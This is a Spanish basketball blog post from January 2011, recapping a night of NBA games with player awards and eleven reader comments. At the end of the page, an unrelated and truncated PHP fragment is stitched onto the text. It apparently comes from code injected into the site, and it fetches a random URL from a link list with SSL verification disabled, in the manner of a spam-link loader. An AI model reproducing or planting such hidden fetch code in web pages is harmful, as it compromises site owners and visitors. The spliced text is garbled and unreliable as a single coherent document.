La Crónica (07/01/2011)

08 de January de 2011 por Viva_Dirk

Kobe Bryant adelantó a Oscar Robertson en el 9º puesto en la lista de los máximos anotadores de todos los tiempos. Ahora son 200 puntos nada más lo que le separan de Hakeem Olajuwon, el siguiente hito en la lista. Es bastante asequible que esta misma temporada adelante también a Elvin Hayes y Moses Malones, quedándose muy cerca de los más de 28.500 puntos que todavía incremente Shaquille O’neal. Cada uno de los que anotó anoche se necesitaron para doblegar unos Hornets tremendamente combativos.

Sin embargo no pudieron aprovecharse de lo que estuvo a punto de ser un nuevo traspiés de los San Antonio Spurs, que lograron levantar en el último cuarto un partido que tenían perdido ante Indiana. Tyler Hansbrough fue el mejor de su equipo firmando el mejor partido de su carrera hasta la fecha.
Los Jazz, sin embargo, sí tropezaron en Memphis y pierden momentáneamente el liderato de la Northwest.

Los Celtics lograron ante Toronto alcanzar a los Lakers como únicos equipos con 3.000 victorias en la competición. La noticia para los verdes, además, fue la extraordinaria actuación del rookie Luke Harangody. Con la inminente vuelta de Garnett y Perkins es difícil que esto no vaya a ser flor de un día.

Los Heat sudaron hasta la prórroga para doblegar a los Bucks y a un Douglas-Roberts en estado de posesión demoniaca. Peor les había ido a los Chicago Bulls, que se la pegaron en Philadelphia contra la tríada Holliday-Meeks-Williams de ejecutores.

Orlando no tuvo piedad de Houston cuajando otro gran partido colectivo, con 6 hombres en dobles figuras, uno de ellos Ryan Anderson al que han reencontrado en Florida. A los Rockets se les vuelve a alejar peligrosamente la zona “postemporada” porque además los Blazers ganaron a los Wolves con un sensacional Wes Matthews a la cabeza.

Para terminar. Los Knicks de D’Antoni y Stoudemire ganaron cómodos en Phoenix. Los Warriors se comieron a los Cavaliers y Washinton destrozó a New Jersey.

MVP: Como cada sábado hay donde elegir, desde el mas sorprendente como Luke Harangody con su 17-11 hasta el habitual Lebron con 26-10-5. Rashard Lewis quiso ayer jugar un rato y se fue hasta los 16 puntos, 13 rebotes y 6 asistencias. Wesley Matthews hizo de Roy con 36 puntos, Rudy Gay lideró a Memphis con 28-9-4, Monta Ellis masacró a los Cavs con 32 puntos y 10 asistencias y Pau Gasol volvió a demostrar su categoría con 21 puntos, 13 rebotes y 7 asistencias. Después de pensarnoslo un poco le damos el premio a Raymond Felton que completó un triple doble con 23 puntos, 10 rebotes y 11 asistencias, sigue acumulando méritos para ser All-Star y para estar en la terna de aspirantes al premio de jugador mas mejorado.

Rookie: Landry Fields sigue a lo suyo, anoche 14-10 con un 100% en tiros, jugadores como el hacen falta en el Madison. Buen partido de Pattrick Patterson que en 22 minutos anotó 12 puntos y capturó 4 rebotes con un 6 de 7 en tiros. Bien Favors con 12-6 en 25 minutos. Premio del dia para Luke Harangody, sus 17 puntos y 11 rebotes le van a dar mas de un premio. Malos partidos de Wall y Wes Johnson, mientras Turner sigue perdiendo minutos en los Sixers.

Sorpresa: Alguna como ver a Lewis jugar al baloncesto ya la hemos mencionado. Jodie Meeks lideró la anotación de los Sixers frente a los Bulls con 24 puntos, esto sabiamos que puede hacerlo, veremos si ha encontrado su sitio. Ayer vimos al Hansbrough que es una leyenda universitaria, 23-12 frente a Tim Duncan. Segundo premio del dia es compartido para Harangody y Manny Harris con 16-10-4. En otro orden de cosas vimos a Childress jugar de center, cosas de la vida.

Decepción: Cuidado al destrozo que esta haciendo Avery Johnson en los Nets, no es que pensaramos en ellos como un gran equipo, pero ayer el mejor fue Farmar, y tiene al Harris&Lopez desquiciados. En el plano puramente individual le damos el premio a una pareja de titulares temporales, Thomas&Bogans colaboraron a la derrota de los Bulls con 0 puntos en 35 minutos que sumaron, no se espera mucho de ellos, pero si algo mas que 0.

MEV: También variado, Hansbrough con 23-12, David West 23-12 y Douglas Roberts con 30 puntos y 5 rebotes. El podio lo abre Andrew Bogut con 12 puntitos, un lamentable 4 de 17 en tiros, pero nada menos que ¡¡27 rebotes!!, 3 asistencias, 3 robos y 2 tapones, si eso no es esforzarse que venga Dios y lo vea. La planta para Carlos Boozer, 31 puntos, 13 rebotes y 14 de 19 en tiros. El premio para alguien cuya temporada no se esta valorando en su justa medida, Kevin Love volvió a realizar una actuación de otra época, como esta siendo practicamente toda su temporada, anoche 30 puntos, 19 rebotes, 10 de 15 en tiros, 3 de 4 en triples y 7 de 7 en tiros libres, BESTIAL.

Comenta

11 comentarios a esta entrada

  1. HeiNeKeN dice:
    #1

    Vi el 1º cuarto del partido de los Nets vs Wizards, menudo desastre los de New Jersey, creo recordar que llegaron a ir 21-3 perdiendo. En ese cuarto Lewis llevaba 11 puntos ya, me sorprende que despues de jugar 40 minutos se quedase en 16 (no termine de ver el partido).

      Citar

  2. Scriers dice:
    #2

    Lo de Lewis es fácil de explicar, el partido estaba tan decidido que se repartieron muchos minutos entre jugadores no habituales. Por otra parte, los Nets son un desastre, pero es que tampoco tienen mucho dónde rascar, y si encima a López le entra la pajarraca, pues entonces queda bien poco, ¿Quién? Harris? Vujacic? Por cierto, el esloveno 1/14 en tiros, lamentabilísimo, ¿nadie le enseñó que si no tiene su día lo mejor es desistir y colaborar de otra forma?

    Y también ví ayer a los españoles, excepto a Pau. Calderón está en una forma excelente, dió 9 pases de canasta pero pudieron ser muchos más. Además, se le ve rápido y defendió bien a Rondo. Luego Marc empezó el partido penoso, con fallos en tiros libres y a media distancia pero luego se repuso e hizo un partido acorde a lo que suele dar. Y Rudy, bueno, Rudy volvió a dar la de cal, quizás su indisposición tiene que ver con la selección de tiro que hizo en la primera parte.

      Citar

  3. Vader dice:
    #3

    Juas juas y yo puse a Avery Johnson como entrenador del año en la porra… es que soy un visionario!!! Jajaja!!!

    Saludos!!

      Citar

  4. a dice:
    #4

    Harangody! El nuevo Scalabrine!

    Qué día más o menos vuelven Garnett y Perkins?

      Citar

  5. Jona dice:
    #5

    Veis a Ellis para el All star? sus numeros no los tiene nadie 25.6 – 5.6 – 2.3 con 48% TC y 40% T3

      Citar

  6. -=TheKing=- dice:
    #6

    Rumores de pelea entre el entrenador de los Bulls y Carlos Boozer. Espero k ese equipazo no se destroce por esta trifulca.

      Citar

  7. TX dice:
    #7

    Los números de Ellis son de All Star, pero no su juego. Tú ves un partido suyo y la mayoria de canastas son antes de que el equipo contrario llegue a defender. Además poco IQ

      Citar

  8. max dice:
    #8

    Repasando la trayectoria de T.Hansbrough en sus etapa universitaria, sorprende su elección en el draft (13 2009) y lo poco que ha destacado hasta ahora en la NBA. Por otra parte, da pena ver cómo les va a los Suns después del multitraspaso con los Magic, sobretodo por Nash. No quedarán últimos de conferencia, pero tampoco andarán muy lejos….

      Citar

  9. rfeltonAS dice:
    #9

    RAYMOND FELTON GRANDE!!!! ES UN JUGADOR QUE ESTE AÑO TIENE QUE ESTAR EN EL ALLSTARS!
    GO KNICKS, GO!

      Citar

  10. HeiNeKeN dice:
    #10

    Por cierto, el 1 de 14 de Vujacic en 22 minutos es digno de mencion tambien xD

      Citar

  11. Jona dice:
    #11

    No digo que ellis no meta algunos tiros fáciles por que tiene yo creo la mayor velocidad ala hora de driblar de toda la liga pero y quien lo merece más que él?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>